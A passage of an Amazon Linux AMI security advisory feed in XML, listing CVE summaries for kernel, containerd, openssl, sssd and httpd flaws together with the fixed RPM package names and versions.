A race problem was seen in the vt_k_ioctl in drivers/tty/vt/vt_ioctl.c in the Linux kernel, which may cause an out of bounds read in vt as the write access to vc_mode is not protected by lock-in vt_ioctl (KDSETMDE). The highest threat from this vulnerability is to data confidentiality.
CVE-2021-3732:
A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible.
CVE-2021-3679:
A lack of CPU resources in the Linux kernel tracing module functionality was found in the way users use the trace ring buffer in specific way. Only privileged local users (with CAP_SYS_ADMIN capability) could use this flaw to starve the resources causing denial of service.
CVE-2021-3655:
A vulnerability was found in the Linux kernel. Missing size validations on inbound SCTP packets may allow the kernel to read uninitialized memory.
CVE-2021-3609:
A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges.
CVE-2021-35477:
A flaw in the Linux kernel allows a privileged BPF program to obtain sensitive information from kernel memory via a Speculative Store Bypass side-channel in the eBPF subsystem
CVE-2021-22543:
A flaw was found in the Linux kernel's KVM implementation, where improper handing of the VM_IO|VM_PFNMAP VMAs in KVM bypasses RO checks and leads to pages being freed while still accessible by the VMM and guest. This flaw allows users who can start and control a VM to read/write random pages of memory, resulting in local privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, and system availability.
CVE-2020-16119:
A flaw was found in the Linux kernel. When reusing a socket with an attached dccps_hc_tx_ccid as a listener, the socket will be used after being released leading to denial of service (DoS) or a potential code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16119" title="" id="CVE-2020-16119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22543" title="" id="CVE-2021-22543" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35477" title="" id="CVE-2021-35477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3609" title="" id="CVE-2021-3609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3655" title="" id="CVE-2021-3655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3679" title="" id="CVE-2021-3679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3732" title="" id="CVE-2021-3732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3753" title="" id="CVE-2021-3753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37576" title="" id="CVE-2021-37576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38160" title="" id="CVE-2021-38160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38198" title="" id="CVE-2021-38198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38204" title="" id="CVE-2021-38204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38205" title="" id="CVE-2021-38205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40490" title="" id="CVE-2021-40490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47309" title="" id="CVE-2021-47309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20141" title="" id="CVE-2022-20141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28772" title="" id="CVE-2023-28772" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.248-129.473.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.248-129.473.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.248" release="129.473.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.248-129.473.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1540</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1540: medium priority package update for containerd</title><issued date="2021-10-01 17:58:00" /><updated date="2021-10-04 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41103:
CVE-2021-41103 containerd:
A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41103" title="" id="CVE-2021-41103" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-3.9.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-3.9.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-3.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1541</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1541: medium priority package update for openssl</title><issued date="2021-10-01 18:00:00" /><updated date="2021-10-04 22:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3712:
It was found that openssl assumed ASN.1 strings to be NUL terminated. A malicious actor may be able to force an application into calling openssl function with a specially crafted, non-NUL terminated string to deliberately hit this bug, which may result in a crash of the application, causing a Denial of Service attack, or possibly, memory disclosure. The highest threat from this vulnerability is to data confidentiality and system availability.
1995634: CVE-2021-3712 openssl: Read buffer overruns processing ASN.1 strings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712" title="" id="CVE-2021-3712" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.154.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.154.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.154.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.154.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1542</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1542: important priority package update for sssd</title><issued date="2021-10-01 18:01:00" /><updated date="2021-10-04 22:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3621:
A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1975142: CVE-2021-3621 sssd: shell command injection in sssctl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3621" title="" id="CVE-2021-3621" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.26.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.26.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.26.amzn1.noarch.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.26.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.26.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1543</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1543: important priority package update for httpd24</title><issued date="2021-10-15 07:52:00" /><updated date="2021-10-15 15:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42013:
A path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773.
2011900: CVE-2021-42013 httpd: path traversal and remote code execution (incomplete fix of CVE-2021-41773)
CVE-2021-41773:
A path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts.
2010757: CVE-2021-41773 httpd: path traversal and file disclosure vulnerability
CVE-2021-41524:
While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.
2010934: CVE-2021-41524 httpd: NULL pointer dereference via crafted request during HTTP/2 request processing
CVE-2021-40438:
A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network.
2005117: CVE-2021-40438 httpd: mod_proxy: SSRF via a crafted request uri-path containing "unix:"
CVE-2021-39275:
An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function.
2005119: CVE-2021-39275 httpd: out-of-bounds write in ap_escape_quotes() via malicious input
CVE-2021-36160:
An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability.
2005124: CVE-2021-36160 httpd: mod_proxy_uwsgi: out-of-bounds read via a crafted request uri-path
CVE-2021-34798:
A NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability.
2005128: CVE-2021-34798 httpd: NULL pointer dereference via malformed requests
CVE-2021-33193:
A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity.
1966728: CVE-2021-33193 httpd: Request splitting via HTTP/2 method injection and mod_proxy
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193" title="" id="CVE-2021-33193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798" title="" id="CVE-2021-34798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160" title="" id="CVE-2021-36160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275" title="" id="CVE-2021-39275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438" title="" id="CVE-2021-40438" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524" title="" id="CVE-2021-41524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773" title="" id="CVE-2021-41773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013" title="" id="CVE-2021-42013" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.51" release="1.94.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.51" release="1.94.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.51" release="1.94.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.51-1.94.amzn1.noarch.rpm</filename></package><package name="httpd24-tools" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.51" release="1.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.51-1.94.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24" 